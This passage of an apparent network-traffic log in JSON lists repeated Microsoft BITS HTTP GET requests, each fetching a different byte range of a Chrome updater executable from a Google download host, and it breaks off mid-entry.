  499. "host": "r5---sn-tt1e7n7e.gvt1.com",
  500. "version": "1.1",
  501. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  502. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=182545-235456\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  503. "port": 80
  504. },
  505. {
  506. "count": 1,
  507. "body": "",
  508. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  509. "user-agent": "Microsoft BITS/7.5",
  510. "method": "GET",
  511. "host": "r5---sn-tt1e7n7e.gvt1.com",
  512. "version": "1.1",
  513. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  514. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=235457-387454\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  515. "port": 80
  516. },
  517. {
  518. "count": 1,
  519. "body": "",
  520. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  521. "user-agent": "Microsoft BITS/7.5",
  522. "method": "GET",
  523. "host": "r5---sn-tt1e7n7e.gvt1.com",
  524. "version": "1.1",
  525. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  526. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=387455-619308\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  527. "port": 80
  528. },
  529. {
  530. "count": 1,
  531. "body": "",
  532. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  533. "user-agent": "Microsoft BITS/7.5",
  534. "method": "GET",
  535. "host": "r5---sn-tt1e7n7e.gvt1.com",
  536. "version": "1.1",
  537. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  538. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=619309-843977\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  539. "port": 80
  540. },
  541. {
  542. "count": 1,
  543. "body": "",
  544. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  545. "user-agent": "Microsoft BITS/7.5",
  546. "method": "GET",
  547. "host": "r5---sn-tt1e7n7e.gvt1.com",
  548. "version": "1.1",
  549. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  550. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=843978-1423050\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  551. "port": 80
  552. },
  553. {
  554. "count": 1,
  555. "body": "",
  556. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  557. "user-agent": "Microsoft BITS/7.5",
  558. "method": "GET",
  559. "host": "r5---sn-tt1e7n7e.gvt1.com",
  560. "version": "1.1",
  561. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  562. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=1423051-2174378\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  563. "port": 80
  564. },
  565. {
  566. "count": 1,
  567. "body": "",
  568. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  569. "user-agent": "Microsoft BITS/7.5",
  570. "method": "GET",
  571. "host": "r5---sn-tt1e7n7e.gvt1.com",
  572. "version": "1.1",
  573. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  574. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=2174379-3522791\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  575. "port": 80
  576. },
  577. {
  578. "count": 1,
  579. "body": "",
  580. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  581. "user-agent": "Microsoft BITS/7.5",
  582. "method": "GET",
  583. "host": "r5---sn-tt1e7n7e.gvt1.com",
  584. "version": "1.1",
  585. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  586. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=3522792-5055846\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  587. "port": 80
  588. },
  589. {
  590. "count": 1,
  591. "body": "",
  592. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  593. "user-agent": "Microsoft BITS/7.5",
  594. "method": "GET",
  595. "host": "r5---sn-tt1e7n7e.gvt1.com",
  596. "version": "1.1",
  597. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  598. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=5055847-6102108\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  599. "port": 80
  600. },
  601. {
  602. "count": 1,
  603. "body": "",
  604. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  605. "user-agent": "Microsoft BITS/7.5",
  606. "method": "GET",
  607. "host": "r5---sn-tt1e7n7e.gvt1.com",
  608. "version": "1.1",
  609. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  610. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6102109-7233475\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  611. "port": 80
  612. },
  613. {
  614. "count": 1,
  615. "body": "",
  616. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  617. "user-agent": "Microsoft BITS/7.5",
  618. "method": "GET",
  619. "host": "r5---sn-tt1e7n7e.gvt1.com",
  620. "version": "1.1",
  621. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  622. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=7233476-9002772\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  623. "port": 80
  624. },
  625. {
  626. "count": 1,
  627. "body": "",
  628. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  629. "user-agent": "Microsoft BITS/7.5",
  630. "method": "GET",
  631. "host": "r5---sn-tt1e7n7e.gvt1.com",
  632. "version": "1.1",
  633. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  634. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=9002773-10438628\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  635. "port": 80
  636. },
  637. {
  638. "count": 1,
  639. "body": "",
  640. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  641. "user-agent": "Microsoft BITS/7.5",
  642. "method": "GET",
  643. "host": "r5---sn-tt1e7n7e.gvt1.com",
  644. "version": "1.1",
  645. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  646. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=10438629-11885988\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  647. "port": 80
  648. },
  649. {
  650. "count": 1,
  651. "body": "",
  652. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  653. "user-agent": "Microsoft BITS/7.5",
  654. "method": "GET",
  655. "host": "r5---sn-tt1e7n7e.gvt1.com",
  656. "version": "1.1",
  657. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  658. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=11885989-12942231\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  659. "port": 80
  660. },
  661. {
  662. "count": 1,
  663. "body": "",
  664. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  665. "user-agent": "Microsoft BITS/7.5",
  666. "method": "GET",
  667. "host": "r5---sn-tt1e7n7e.gvt1.com",
  668. "version": "1.1",
  669. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  670. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=12942232-13981114\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  671. "port": 80
  672. },
  673. {
  674. "count": 1,
  675. "body": "",
  676. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  677. "user-agent": "Microsoft BITS/7.5",
  678. "method": "GET",
  679. "host": "r5---sn-tt1e7n7e.gvt1.com",
  680. "version": "1.1",
  681. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  682. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=13981115-15457991\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  683. "port": 80
  684. },
  685. {
  686. "count": 1,
  687. "body": "",
  688. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  689. "user-agent": "Microsoft BITS/7.5",
  690. "method": "GET",
  691. "host": "r5---sn-tt1e7n7e.gvt1.com",
  692. "version": "1.1",
  693. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  694. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=15457992-16973479\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  695. "port": 80
  696. },
  697. {
  698. "count": 1,
  699. "body": "",
  700. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  701. "user-agent": "Microsoft BITS/7.5",
  702. "method": "GET",
  703. "host": "r5---sn-tt1e7n7e.gvt1.com",
  704. "version": "1.1",
  705. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  706. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=16973480-18438938\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  707. "port": 80
  708. },
  709. {
  710. "count": 1,
  711. "body": "",
  712. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  713. "user-agent": "Microsoft BITS/7.5",
  714. "method": "GET",
  715. "host": "r5---sn-tt1e7n7e.gvt1.com",
  716. "version": "1.1",
